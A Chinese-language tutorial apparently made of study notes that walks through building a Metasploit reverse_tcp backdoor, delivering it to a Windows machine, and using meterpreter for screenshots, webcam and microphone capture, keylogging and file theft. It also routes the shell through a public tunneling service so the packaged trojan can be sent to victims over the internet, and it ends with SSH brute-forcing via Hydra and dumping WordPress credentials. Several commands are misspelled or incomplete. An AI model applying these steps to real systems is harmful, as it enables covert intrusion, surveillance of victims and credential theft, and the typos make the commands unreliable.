# Kali 攻击机渗透教程
# 植入后门
- 设置攻击机 IP 和端口:
- LHOST: 攻击机 IP(
ifconfig查看)。 - LPORT: 自定义端口(范围 1-65535)。
- 注入后门时出现
Injection Completed!表示注入完成。
# kali 攻击机
- 启动工具:msfconsole(攻击框架)
- 加载有效攻击载体(相当于导弹发射台 + 导弹本身):
use exploit/multi/handler - 设置有效攻击载何:
set payload 【windows/meterpreret/reverse_tcp】(设置什么就保持一致;相当于弹头) show options- 设置攻击机参数:
- set LHOST = 设置 kali 攻击机的 IP
- set LPORT = 前面自定义的端口大小
- run
- 出现:等待状态(钓鱼)
- 开另一个 windows 虚拟机(网络模式和 kali 一致 —NAT)
- ping 攻击机 kali 的 IP(查看是否 ping 的通)
# 木马传输与执行
-
cmd 打开
-
cd desktop 找到木马
-
在目录下输入 cmd 打开
-
输入 -m http.server 8080(端口)
-
在新开的 windows 虚拟机里面访问:
http://真实机IP:8080(端口) -
下载,运行
-
此时 kali 攻击机则会出现:meterpreter >
-
输入:screenshot (截屏)
-
在 kali 攻击机里面新建一个窗口,进入 root 模式
-
查看帮助
apt-get - -help,安装工具:apt update /apt-get update -
kali 攻击机的原窗口
- 输入:screenshare(共享屏幕)
- meterpreter > pwd
- meterpreter > mkdir 目录名(在桌面创建一个目录)
- meterpreter > cd 目录名 \
- meterpreter > dir
- meterpreter > upload 文件名(想要传入的文件)
- meterpreter > ls(查看)
- meterpreter > download 文件名(下载文件)
-
在 kali 攻击机另一个窗口输入:
cat 下载的文件名
# 网络木马
- 小米球
- 系统管理
- 账户管理
- 我的隧道:
- 协议:TCP
- 本地服务地址:攻击机 IP:端口(攻击机)
- 我的账户 - 拷贝隧道
- xiaomiqiu.conf 文件下将 auth_token 后改为拷贝的隧道
- 小米球 bat 显示 online
- ping 一下它显示的 IP,再次打开 ssl
- 输入 LHOST:小米球给的 IP,LPORT:小米球分配的端口
- 植入完成,打包一下丢出去
# kali 攻击机
- meterpreter > sysinfo
- meterpreter > pwd
- meterpreter > webcam_list(摄像头列表)
- meterpreter > webcam_snap(摄像头截图)
- meterpreter > webcam_stream(实时摄像头)
- meterpreter > record_mic -d 10(麦克风,10 代表 10s)
- meterpreter > keyscan_start(截取操作数据)
- meterpreter > keycan_dump(抓取数据)
- meterpreter >play 截取声音的路径(在受攻击的电脑播放声音)
# 确保 kali 和目标机网络模式一样
- kali 里面工具:
netdiscover -i eth0(网卡名) -r 192.168.86.0/24 (.2是网关) - 采端口:
masscan -p0-65535 192.168.86.137 - -rate = 10000 port-端口 - ping 192.168.86.133
- ttl
- 真实机:
- cmd
- ssh ip
- Xshell:
- ssh ip
- 接受并保存
- 泄漏:服务器类型
- 开始网上查
# 进入 kali:
msfconsole(渗透测试框架)
search auxiliary ssh user
use 6
show options
set rhosts 192.168.86.133
set user_file
# 新建终端:
locate wordlist root (忘记了可以查:ls/usr/share/wordlists)
ls /usr/share/wordlists/metasploit -a
cd /usr/share/wordlists/metasploit
ls -l
找到 common_roots.txt(用户名字典)
完整路径:/usr/share/wordlists/metasploit/common_roots.txt
# 回到之前的终端:
复制完整路径: set user_file /user/share/wordlists/metasploit/common_roots.txt
检查清单: show options
run
# 将找到的用户名复制做成字典
- 桌面建一个文本文档
- Search-Find and Replace
- Search for:User 前面一坨
- Replace with:不用填 (同样方法把 find 替换掉)
# kali 的用户名:
cat /etc/passwd
- nologin(不能登录)
- 找到能登录的用户名
- 保存到桌面
# 终端:
cat user.txt(保存的)
cd /usr/share/wordlists
ls-l
- 找到 rockyou.txt.gz
- 拷贝:cp rockyou.txt.gz/root/Desktop/
- 回到桌面:cd /root/Desktop
- 解压:gunzip rockyou.txt.gz
# Hydra(九头蛇)暴力破解
hydra -L user.txt -P rockyou.txt -t 6 ssh://192.168.86.133
# 开一个终端
ssh 用户名@192.168.86.133
进入网站找线索:192.168.86.133 (Wordpress 等)
- cd/
- ls (或者:- cd/var -ls)
- www/
- ls (有 flag)
- cat flag.txt
- ls
- cd html/
- cd wordpress/
- ls
- cat wp-config.php
- 找到密码
# Xshell 里面登陆
- mysql -u root -p;
- show databases;
- use wordpress;
- show tables;
- select *from wp_users;
- 网站 MD5 解密
- 也可以直接创建一个密码替换进去(网上找)
# 网站乱码:
- network
- 打开域名
- 打开火绒
- 打开 host 修改器
- 输入:192.168.86.133 域名(不要带 http)